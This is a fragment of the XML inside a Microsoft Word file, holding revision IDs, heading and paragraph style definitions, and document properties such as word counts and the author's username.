    <w:rsid w:val="00EA100D"/>
    <w:rsid w:val="00EA51C0"/>
    <w:rsid w:val="00EB0EC6"/>
    <w:rsid w:val="00EB6161"/>
    <w:rsid w:val="00EB69DE"/>
    <w:rsid w:val="00ED7608"/>
    <w:rsid w:val="00F15DA5"/>
    <w:rsid w:val="00F20DEE"/>
    <w:rsid w:val="00F22648"/>
    <w:rsid w:val="00F3036B"/>
    <w:rsid w:val="00F33FC3"/>
    <w:rsid w:val="00F347B3"/>
    <w:rsid w:val="00F35143"/>
    <w:rsid w:val="00F41B33"/>
    <w:rsid w:val="00F43689"/>
    <w:rsid w:val="00F466BC"/>
    <w:rsid w:val="00F54574"/>
    <w:rsid w:val="00F54EE5"/>
    <w:rsid w:val="00F56BD0"/>
    <w:rsid w:val="00F613FE"/>
    <w:rsid w:val="00F70A90"/>
    <w:rsid w:val="00F75487"/>
    <w:rsid w:val="00F8266D"/>
    <w:rsid w:val="00F96FA2"/>
    <w:rsid w:val="00FA5F72"/>
    <w:rsid w:val="00FC0907"/>
    <w:rsid w:val="00FD2CFA"/>
    <w:rsid w:val="00FD7F96"/>
    <w:rsid w:val="00FE26FB"/>
    <w:rsid w:val="00FE5AFD"/>
    <w:rsid w:val="00FF50F7"/>
    <w:rsid w:val="00FF71F0"/>
    <w:rsid w:val="00FF72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089EEC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3F86551F-E414-416B-8EEF-8E32FF389C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95D7A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:eastAsia="en-IN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B84485"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:kern w:val="2"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="27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1C68E0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32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3552B4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28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2116F5"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2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5D7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5D7A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5D7A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5D7A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5D7A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4485"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsia="Times New Roman" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="27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1C68E0"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00224E8A"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4472C4" w:themeColor="accent1"/>
      </w:pBdr>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="323E4F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224E8A"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="323E4F" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003552B4"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:sz w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002116F5"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:color w:val="ED7D31" w:themeColor="accent2"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00224E8A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:color w:val="0000FF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Abstract">
    <w:name w:val="Abstract"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00107676"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AE6D6F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AE6D6F"/>
    <w:rPr>
      <w:rFonts w:ascii="Yu Gothic" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Yu Gothic"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22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5D7A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22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5D7A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22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5D7A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22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5D7A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22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5D7A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22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5D7A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5D7A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995D7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5D7A"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00995D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5D7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5D7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5D7A"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22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995D7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2249</Words>
  <Characters>12823</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>106</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15042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sandeep j0352</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sandeep j0352</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-05T15:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-05T15:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>